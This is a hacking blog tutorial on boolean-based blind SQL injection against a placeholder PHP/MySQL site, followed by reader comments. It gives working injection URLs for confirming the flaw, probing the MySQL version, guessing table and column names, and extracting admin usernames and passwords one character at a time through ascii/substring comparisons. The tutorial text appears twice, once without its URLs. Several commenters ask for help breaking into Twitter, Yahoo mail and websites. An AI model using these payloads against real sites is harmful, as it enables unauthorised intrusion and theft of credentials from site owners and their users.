In my previous articles, i have shown you how we can hack websites using simple SQL injection and Query based basic SQL injection. Today i am going to show you the detailed concept of Blind SQL injection.When the website is vulnerable to sql injection but not showing any data on it's pages we go for blind SQL injection. Blind injection is a little more complicated/time consuming. So before going into Blind sql injection, you must have the knowledge of basic SQL injections. So it is strongly recommended you to read my previous articles before proceeding.
Here is the vulnerable link.
Testing For Vulnerability
We test the injection is subject to a blind attack by going to the following link.
MySQL Version
Checking For Table Names
Checking For Column Names
If you are lucky and guessed some good table names we now can try guessing some columns within those tables.
If the column password exists, then the page loads normally else try another column name.Now let us assume that we got the table name admin and two columns username and password. We have to pull the data from these table/columns.
Pulling Data From Found Table/Columns
This is the actual part that takes lots of time. We use ascii characters in order to pull data since no data will be displayed on the page.
In the above example,I have set user id = 2 and trying to pull the password. If the ascii char was greater then 100 the page will load normally. In our case the page doesn't load with the content so we know the first char is less then 100, we guess again.
To get the next character we modify the sub string.
I changed the substring ,1,1 to 2,1. now it returns the 2nd character of the subselect, 1 character in length. we do the same thing again as the first char. This time >100 returned true so we raise the number.
false,lower
true, higher
Or you can go online for the same chart from the following link.
Hope you liked this article, feel free to leave your comments for further doubts and clarifications.
Here is the vulnerable link.
http://vulnerablesite.com/product.php?id=12
When we visit the url we see a product article with a title and content.Testing For Vulnerability
We test the injection is subject to a blind attack by going to the following link.
http:// vulnerablesite.com/product.php?id=12 and 1=1
we should see the same url and contents, then try going tohttp:// vulnerablesite.com/product.php?id=12 and 1=2
on a successful injection you will see content missing on the page. Because 1=2 is always false.MySQL Version
http:// vulnerablesite.com/product.php?id=12 and substring(@@version,1,1)=4
what i did here was get the first character of @@version and compare it to =4, if its TRUE, the page loads normally. It means the version is 4. If there is any content missing, we change the 4 to 5 and try again, this time the page loads normally with the content there so we know were dealing with Mysql5Checking For Table Names
http:// vulnerablesite.com/product.php?id=12 and (SELECT 1 from admin limit 0,1)=1
I tried guessing for table admin, if there is a table called admin it will load normally. Just change the table to guess table names. If it gives an error or content missing,then the table doesn’t exist. So try another table name.Checking For Column Names
If you are lucky and guessed some good table names we now can try guessing some columns within those tables.
http:// vulnerablesite.com/product.php?id=12 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1
If the column password exists, then the page loads normally else try another column name.Now let us assume that we got the table name admin and two columns username and password. We have to pull the data from these table/columns.
Pulling Data From Found Table/Columns
This is the actual part that takes lots of time. We use ascii characters in order to pull data since no data will be displayed on the page.
http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100
In the above example,I have set user id = 2 and trying to pull the password. If the ascii char was greater then 100 the page will load normally. In our case the page doesn't load with the content so we know the first char is less then 100, we guess again.
http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>80
page loads normally with >80, true. We go higher.http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>90
false, so we go lower.http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>86
false. We now narrowed it down to be greater then 85 but not greater then 86. So we know our number is 86! You can test by doing =86 if you want to be sure, it may be confusing at first. Using an ascii converter we knows char(86) is 'V', so the first letter of our returned row is 'V'.To get the next character we modify the sub string.
http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>100
I changed the substring ,1,1 to 2,1. now it returns the 2nd character of the subselect, 1 character in length. we do the same thing again as the first char. This time >100 returned true so we raise the number.
http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>120
false, lower the 120http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>110
false, lowerhttp:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>105
false,lower
http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>103
true, higher
http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>104
, we see that its greater then 104 and NOT greater then 105 making the number we want 105. char(105) is 'i'. So we have 'Vi' so far. Keep incrementing the substring until you get to the end where >0 will return false.I am giving you an ascii code chart for better understanding.
Or you can go online for the same chart from the following link.
Hope you liked this article, feel free to leave your comments for further doubts and clarifications.
Excellent one ! i was searching this for a long time thank u john and srinivas :)
REPLYHello. This is a Good Tutorial But I was Thinking That anyone Could Tell me How to Hack an Twitter account that is not active and not checked email and not used anymore, cause I need to recover it. Please anyone help!!
REPLYcan this method be used for yahoo mail?
REPLYi wanted to hack a website through sql injection your articals are based on php but it's not working with sit? =something so please help me
REPLYUse the form below to comment. No spam please!!!